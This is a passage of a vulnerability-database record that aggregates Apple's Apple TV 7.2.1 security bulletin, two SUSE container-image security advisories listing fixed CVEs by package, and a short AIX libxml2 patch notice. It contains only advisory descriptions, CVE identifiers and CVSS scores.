through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\n\n * **FontParser**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation.\n\nCVE-ID\n\nCVE-2015-3804 : Apple\n\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\n\nCVE-2015-5775 : Apple\n\n * **ImageIO**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted .tiff file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of .tiff files. This issue was addressed through improved bounds checking.\n\nCVE-ID\n\nCVE-2015-5758 : Apple\n\n * **ImageIO**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An uninitialized memory access issue existed in ImageIO's handling of PNG images. This issue was addressed through improved memory initialization and additional validation of PNG images.\n\nCVE-ID\n\nCVE-2015-5781 : Michal Zalewski\n\n * **ImageIO**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An uninitialized memory access issue existed in ImageIO's handling of TIFF images. This issue is addressed through improved memory initialization and additional validation of TIFF images.\n\nCVE-ID\n\nCVE-2015-5782 : Michal Zalewski\n\n * **IOKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing a maliciously crafted plist may lead to an unexpected application termination or arbitrary code execution with system privileges\n\nDescription: A memory corruption existed in processing of malformed plists. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein (@jollyjinx) of Jinx Germany\n\n * **IOHIDFamily**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A local user may be able to execute arbitrary code with system privileges\n\nDescription: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-5774 : TaiG Jailbreak Team\n\n * **Kernel**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An issue existed in the mach_port_space_info interface, which could have led to the disclosure of kernel memory layout. This was addressed by disabling the mach_port_space_info interface.\n\nCVE-ID\n\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team, @PanguTeam\n\n * **Kernel**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments.\n\nCVE-ID\n\nCVE-2015-3768 : Ilja van Sprundel\n\n * **Libc**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted regular expression may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the TRE library. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3796 : Ian Beer of Google Project Zero\n\nCVE-2015-3797 : Ian Beer of Google Project Zero\n\nCVE-2015-3798 : Ian Beer of Google Project Zero\n\n * **Libinfo**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in handling AF_INET6 sockets. This issue was addressed by improved memory handling.\n\nCVE-ID\n\nCVE-2015-5776 : Apple\n\n * **libpthread**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue existed in handling syscalls. This issue was addressed through improved lock state checking.\n\nCVE-ID\n\nCVE-2015-5757 : Lufeng Li of Qihoo 360\n\n * **libxml2**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: A memory corruption issue existed in parsing of XML files. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3807 : Michal Zalewski\n\n * **libxml2**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2, the most serious of which may allow a remote attacker to cause a denial of service\n\nDescription: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2. These were addressed by updating libxml2 to version 2.9.2.\n\nCVE-ID\n\nCVE-2012-6685 : Felix Groebert of Google\n\nCVE-2014-0191 : Felix Groebert of Google\n\nCVE-2014-3660 : Felix Groebert of Google\n\n * **libxpc**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue existed in handling of malformed XPC messages. This issue was improved through improved bounds checking.\n\nCVE-ID\n\nCVE-2015-3795 : Mathew Rowley\n\n * **libxslt**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing maliciously crafted XML may lead to arbitrary code execution\n\nDescription: A type confusion issue existed in libxslt. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-7995 : puzzor\n\n * **Location Framework**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A local user may be able to modify protected parts of the filesystem\n\nDescription: A symbolic link issue was addressed through improved path validation.\n\nCVE-ID\n\nCVE-2015-3759 : Cererdlong of Alibaba Mobile Security Team\n\n * **Office Viewer**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing maliciously crafted XML may lead to disclosure of user information\n\nDescription: An external entity reference issue existed in XML parsing. This issue was addressed through improved parsing.\n\nCVE-ID\n\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A. \n\n * **QL Office**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in parsing of office documents. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-5773 : Apple\n\n * **Sandbox_profiles**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: An malicious app may be able to read other apps' managed preferences\n\nDescription: An issue existed in the third-party app sandbox. This issue was addressed by improving the third-party sandbox profile.\n\nCVE-ID\n\nCVE-2015-5749 : Andreas Weinlein of the Appthority Mobility Threat Team\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing maliciously crafted web content may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues existed in WebKit. These issues were addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-3730 : Apple\n\nCVE-2015-3731 : Apple\n\nCVE-2015-3732 : Apple\n\nCVE-2015-3733 : Apple\n\nCVE-2015-3734 : Apple\n\nCVE-2015-3735 : Apple\n\nCVE-2015-3736 : Apple\n\nCVE-2015-3737 : Apple\n\nCVE-2015-3738 : Apple\n\nCVE-2015-3739 : Apple\n\nCVE-2015-3740 : Apple\n\nCVE-2015-3741 : Apple\n\nCVE-2015-3742 : Apple\n\nCVE-2015-3743 : Apple\n\nCVE-2015-3744 : Apple\n\nCVE-2015-3745 : Apple\n\nCVE-2015-3746 : Apple\n\nCVE-2015-3747 : Apple\n\nCVE-2015-3748 : Apple\n\nCVE-2015-3749 : Apple\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Maliciously crafted web content may exfiltrate image data cross-origin\n\nDescription: Images fetched through URLs that redirected to a data:image resource could have been exfiltrated cross-origin. This issue was addressed through improved canvas taint tracking.\n\nCVE-ID\n\nCVE-2015-3753 : Antonio Sanso and Damien Antipa of Adobe\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Maliciously crafted web content may trigger plaintext requests to an origin under HTTP Strict Transport Security\n\nDescription: An issue existed where Content Security Policy report requests would not honor HTTP Strict Transport Security (HSTS). The issue was addressed by applying HSTS to CSP.\n\nCVE-ID\n\nCVE-2015-3750 : Muneaki Nishimura (nishimunea)\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Content Security Policy report requests may leak cookies\n\nDescription: Two issues existed in how cookies were added to Content Security Policy report requests. Cookies were sent in cross-origin report requests in violation of the standard. Cookies set during regular browsing were sent in private browsing. These issues were addressed through improved cookie handling.\n\nCVE-ID\n\nCVE-2015-3752 : Muneaki Nishimura (nishimunea)\n\n * **WebKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Image loading may violate a website's Content Security Policy directive\n\nDescription: An issue existed where processing web content with video controls would load images nested in object elements in violation of the website's Content Security Policy directive. This issue was addressed through improved Content Security Policy enforcement.\n\nCVE-ID\n\nCVE-2015-3751 : Muneaki Nishimura (nishimunea)\n", "edition": 2, "modified": "2017-01-23T03:54:31", "published": "2017-01-23T03:54:31", "id": "APPLE:HT205795", "href": "https://support.apple.com/kb/HT205795", "title": "About the security content of Apple TV 7.2.1 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-10-11T05:54:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6262", "CVE-2017-7407", "CVE-2015-8388", "CVE-2016-8620", "CVE-2016-8623", "CVE-2017-9233", "CVE-2016-5420", "CVE-2016-9840", "CVE-2016-3705", "CVE-2016-1840", "CVE-2014-0191", "CVE-2016-8615", "CVE-2016-8616", "CVE-2015-5276", "CVE-2015-3210", "CVE-2015-2325", "CVE-2016-6261", "CVE-2016-8619", "CVE-2017-10685", "CVE-2016-6306", "CVE-2016-2183", "CVE-2016-2178", "CVE-2015-8391", "CVE-2016-6263", "CVE-2016-2108", "CVE-2016-9063", "CVE-2016-8618", "CVE-2016-1762", "CVE-2016-6302", "CVE-2016-5300", "CVE-2015-8395", "CVE-2016-7141", "CVE-2016-1834", "CVE-2017-11112", "CVE-2016-2177", "CVE-2014-7169", "CVE-2015-8382", "CVE-2016-3627", "CVE-2015-1283", "CVE-2014-6277", "CVE-2016-2105", "CVE-2016-9318", "CVE-2016-4483", "CVE-2016-2107", "CVE-2015-8386", "CVE-2014-6278", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-3075", "CVE-2016-8617", "CVE-2016-9842", "CVE-2016-7796", "CVE-2017-2616", "CVE-2016-0634", "CVE-2012-6702", "CVE-2015-3238", "CVE-2016-2180", "CVE-2016-1835", "CVE-2016-0787", "CVE-2016-1234", "CVE-2016-0718", "CVE-2016-6185", "CVE-2015-8392", "CVE-2016-4574", "CVE-2015-8389", "CVE-2016-2109", "CVE-2015-8380", "CVE-2016-2181", "CVE-2016-6304", "CVE-2016-4449", "CVE-2017-9048", "CVE-2014-8964", "CVE-2015-2059", "CVE-2017-11113", "CVE-2016-1283", "CVE-2016-6313", "CVE-2016-1837", "CVE-2016-6318", "CVE-2015-3622", "CVE-2016-4448", "CVE-2016-1238", "CVE-2015-8393", "CVE-2016-1838", "CVE-2016-3706", "CVE-2016-4429", "CVE-2016-2381", "CVE-2016-7543", "CVE-2017-1000101", "CVE-2016-8622", "CVE-2015-8853", "CVE-2014-7187", "CVE-2015-8394", "CVE-2016-4008", "CVE-2014-9770", "CVE-2015-3217", "CVE-2014-6271", "CVE-2017-7526", "CVE-2016-3191", "CVE-2017-1000366", "CVE-2016-1839", "CVE-2016-8624", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-9047", "CVE-2015-8948", "CVE-2014-7824", "CVE-2015-8842", "CVE-2016-9597", "CVE-2015-5218", "CVE-2016-6303", "CVE-2015-8383", "CVE-2017-1000100", "CVE-2015-8381", "CVE-2016-2182", "CVE-2016-5421", "CVE-2016-9586", "CVE-2015-5073", "CVE-2016-4447", "CVE-2016-5011", "CVE-2015-7511", "CVE-2015-8385", "CVE-2015-8806", "CVE-2016-9841", "CVE-2016-4579", "CVE-2015-0245", "CVE-2016-2037", "CVE-2016-2073", "CVE-2016-5419", "CVE-2015-2328", "CVE-2017-6507", "CVE-2016-4658", "CVE-2016-7167", "CVE-2017-10684", "CVE-2016-2179", "CVE-2016-2106", "CVE-2016-1833", "CVE-2015-8387", "CVE-2016-8621", "CVE-2015-8390", "CVE-2017-9050"], "description": "The SUSE Linux Enterprise Server 12 container image has been updated to\n include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 are now included in the base\n image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n util-linux:\n\n - CVE-2015-5218\n - CVE-2016-5011\n - CVE-2017-2616\n\n cracklib:\n\n - CVE-2016-6318\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - openldap2\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - shadow\n - zypper\n\n", "edition": 1, "modified": "2017-10-11T03:06:53", "published": "2017-10-11T03:06:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html", "id": "SUSE-SU-2017:2699-1", "title": "Security update for SLES 12 Docker image (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-11T05:54:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6262", "CVE-2016-7056", "CVE-2017-7407", "CVE-2015-8388", "CVE-2016-8620", "CVE-2016-8623", "CVE-2017-9233", "CVE-2016-5420", "CVE-2016-9840", "CVE-2016-3705", "CVE-2016-1840", "CVE-2014-0191", "CVE-2016-8615", "CVE-2016-8616", "CVE-2015-5276", "CVE-2015-3210", "CVE-2015-2325", "CVE-2016-6261", "CVE-2016-8619", "CVE-2017-10685", "CVE-2016-6306", "CVE-2016-2183", "CVE-2015-0860", "CVE-2016-2178", "CVE-2015-8391", "CVE-2016-6263", "CVE-2016-2108", "CVE-2016-9063", "CVE-2016-8618", "CVE-2016-1762", "CVE-2016-6302", "CVE-2016-5300", "CVE-2015-8395", "CVE-2016-7141", "CVE-2016-1834", "CVE-2017-11112", "CVE-2016-2177", "CVE-2014-7169", "CVE-2015-8382", "CVE-2016-3627", "CVE-2015-1283", "CVE-2014-6277", "CVE-2016-2105", "CVE-2016-9318", "CVE-2016-4483", "CVE-2016-2107", "CVE-2017-3731", "CVE-2015-8386", "CVE-2014-6278", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-3075", "CVE-2016-8617", "CVE-2016-9842", "CVE-2016-7796", "CVE-2017-2616", "CVE-2016-0634", "CVE-2012-6702", "CVE-2015-3238", "CVE-2016-2180", "CVE-2016-1835", "CVE-2016-0787", "CVE-2016-8610", "CVE-2016-1234", "CVE-2016-0718", "CVE-2016-6185", "CVE-2015-8392", "CVE-2016-4574", "CVE-2015-8389", "CVE-2016-2109", "CVE-2015-8380", "CVE-2016-2181", "CVE-2016-6304", "CVE-2016-4449", "CVE-2017-9048", "CVE-2014-8964", "CVE-2015-2059", "CVE-2017-11113", "CVE-2016-1283", "CVE-2016-6313", "CVE-2016-1837", "CVE-2016-6318", "CVE-2015-3622", "CVE-2016-4448", "CVE-2016-1238", "CVE-2015-8393", "CVE-2016-1838", "CVE-2016-3706", "CVE-2016-4429", "CVE-2016-2381", "CVE-2016-7543", "CVE-2017-1000101", "CVE-2016-8622", "CVE-2015-8853", "CVE-2014-7187", "CVE-2015-8394", "CVE-2016-4008", "CVE-2014-9770", "CVE-2015-3217", "CVE-2014-6271", "CVE-2017-7526", "CVE-2016-3191", "CVE-2017-1000366", "CVE-2016-1839", "CVE-2016-8624", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-9047", "CVE-2015-8948", "CVE-2014-7824", "CVE-2015-8842", "CVE-2016-9597", "CVE-2016-6303", "CVE-2015-8383", "CVE-2017-1000100", "CVE-2015-8381", "CVE-2016-2182", "CVE-2016-5421", "CVE-2016-9586", "CVE-2015-5073", "CVE-2016-4447", "CVE-2016-5011", "CVE-2015-7511", "CVE-2015-8385", "CVE-2015-8806", "CVE-2016-9841", "CVE-2016-4579", "CVE-2015-0245", "CVE-2016-2037", "CVE-2016-2073", "CVE-2016-5419", "CVE-2015-2328", "CVE-2017-6507", "CVE-2016-4658", "CVE-2016-7167", "CVE-2017-10684", "CVE-2016-2179", "CVE-2016-2106", "CVE-2016-1833", "CVE-2015-8387", "CVE-2016-8621", "CVE-2015-8390", "CVE-2017-9050"], "description": "The SUSE Linux Enterprise Server 12 SP1 container image has been updated\n to include security and stability fixes.\n\n The following issues related to building of the container images have been\n fixed:\n\n - Included krb5 package to avoid the inclusion of krb5-mini which gets\n selected as a dependency by the Build Service solver. (bsc#1056193)\n - Do not install recommended packages when building container images.\n (bsc#975726)\n\n A number of security issues that have been already fixed by updates\n released for SUSE Linux Enterprise Server 12 SP1 are now included in the\n base image. A package/CVE cross-reference is available below.\n\n pam:\n\n - CVE-2015-3238\n\n libtasn1:\n\n - CVE-2015-3622\n - CVE-2016-4008\n\n expat:\n\n expat:\n\n - CVE-2012-6702\n - CVE-2015-1283\n - CVE-2016-0718\n - CVE-2016-5300\n - CVE-2016-9063\n - CVE-2017-9233\n\n libidn:\n\n - CVE-2015-2059\n - CVE-2015-8948\n - CVE-2016-6261\n - CVE-2016-6262\n - CVE-2016-6263\n\n\n zlib:\n\n - CVE-2016-9840\n - CVE-2016-9841\n - CVE-2016-9842\n - CVE-2016-9843\n\n curl:\n\n - CVE-2016-5419\n - CVE-2016-5420\n - CVE-2016-5421\n - CVE-2016-7141\n - CVE-2016-7167\n - CVE-2016-8615\n - CVE-2016-8616\n - CVE-2016-8617\n - CVE-2016-8618\n - CVE-2016-8619\n - CVE-2016-8620\n - CVE-2016-8621\n - CVE-2016-8622\n - CVE-2016-8623\n - CVE-2016-8624\n - CVE-2016-9586\n - CVE-2017-1000100\n - CVE-2017-1000101\n - CVE-2017-7407\n\n openssl:\n\n - CVE-2016-2105\n - CVE-2016-2106\n - CVE-2016-2107\n - CVE-2016-2108\n - CVE-2016-2109\n - CVE-2016-2177\n - CVE-2016-2178\n - CVE-2016-2179\n - CVE-2016-2180\n - CVE-2016-2181\n - CVE-2016-2182\n - CVE-2016-2183\n - CVE-2016-6302\n - CVE-2016-6303\n - CVE-2016-6304\n - CVE-2016-6306\n - CVE-2016-7056\n - CVE-2016-8610\n - CVE-2017-3731\n\n cracklib:\n\n - CVE-2016-6318\n\n pcre:\n\n - CVE-2014-8964\n - CVE-2015-2325\n - CVE-2015-2327\n - CVE-2015-2328\n - CVE-2015-3210\n - CVE-2015-3217\n - CVE-2015-5073\n - CVE-2015-8380\n - CVE-2015-8381\n - CVE-2015-8382\n - CVE-2015-8383\n - CVE-2015-8384\n - CVE-2015-8385\n - CVE-2015-8386\n - CVE-2015-8387\n - CVE-2015-8388\n - CVE-2015-8389\n - CVE-2015-8390\n - CVE-2015-8391\n - CVE-2015-8392\n - CVE-2015-8393\n - CVE-2015-8394\n - CVE-2015-8395\n - CVE-2016-1283\n - CVE-2016-3191\n\n appamor:\n\n - CVE-2017-6507\n\n bash:\n\n - CVE-2014-6277\n - CVE-2014-6278\n - CVE-2016-0634\n - CVE-2016-7543\n\n cpio:\n\n - CVE-2016-2037\n\n glibc:\n\n - CVE-2016-1234\n - CVE-2016-3075\n - CVE-2016-3706\n - CVE-2016-4429\n - CVE-2017-1000366\n\n perl:\n\n - CVE-2015-8853\n - CVE-2016-1238\n - CVE-2016-2381\n - CVE-2016-6185\n\n libssh2_org:\n\n - CVE-2016-0787\n\n util-linux:\n\n - CVE-2016-5011\n - CVE-2017-2616\n\n ncurses:\n\n - CVE-2017-10684\n - CVE-2017-10685\n - CVE-2017-11112\n - CVE-2017-11113\n\n libksba:\n\n - CVE-2016-4574\n - CVE-2016-4579\n\n libxml2:\n\n - CVE-2014-0191\n - CVE-2015-8806\n - CVE-2016-1762\n - CVE-2016-1833\n - CVE-2016-1834\n - CVE-2016-1835\n - CVE-2016-1837\n - CVE-2016-1838\n - CVE-2016-1839\n - CVE-2016-1840\n - CVE-2016-2073\n - CVE-2016-3627\n - CVE-2016-3705\n - CVE-2016-4447\n - CVE-2016-4448\n - CVE-2016-4449\n - CVE-2016-4483\n - CVE-2016-4658\n - CVE-2016-9318\n - CVE-2016-9597\n - CVE-2017-9047\n - CVE-2017-9048\n - CVE-2017-9049\n - CVE-2017-9050\n\n libgcrypt:\n\n - CVE-2015-7511\n - CVE-2016-6313\n - CVE-2017-7526\n\n update-alternatives:\n\n - CVE-2015-0860\n\n systemd:\n\n - CVE-2014-9770\n - CVE-2015-8842\n - CVE-2016-7796\n\n dbus-1:\n\n - CVE-2014-7824\n - CVE-2015-0245\n\n Finally, the following packages received non-security fixes:\n\n - augeas\n - bzip2\n - ca-certificates-mozilla\n - coreutils\n - cryptsetup\n - cyrus-sasl\n - dirmngr\n - e2fsprogs\n - findutils\n - gpg2\n - insserv-compat\n - kmod\n - libcap\n - libsolv\n - libzypp\n - lua51\n - lvm2\n - netcfg\n - p11-kit\n - permissions\n - procps\n - rpm\n - sed\n - sg3_utils\n - shadow\n - zypper\n\n", "edition": 1, "modified": "2017-10-11T03:07:32", "published": "2017-10-11T03:07:32", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html", "id": "SUSE-SU-2017:2700-1", "title": "Security update for SLES 12-SP1 Docker image (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

AIX 6.1 TL 9 : bos.rte.control (U861276)

Description

The remote host is missing AIX PTF U861276, which is related to the security of the package bos.rte.control. Libxml2 is vulnerable to a denial of service, caused by the expansion of internal entities within the xmlParserHandlePEReference().

The remote host is missing AIX PTF U861276, which is related to the security of the package bos.rte.control.

Libxml2 is vulnerable to a denial of service, caused by the expansion of internal entities within the xmlParserHandlePEReference().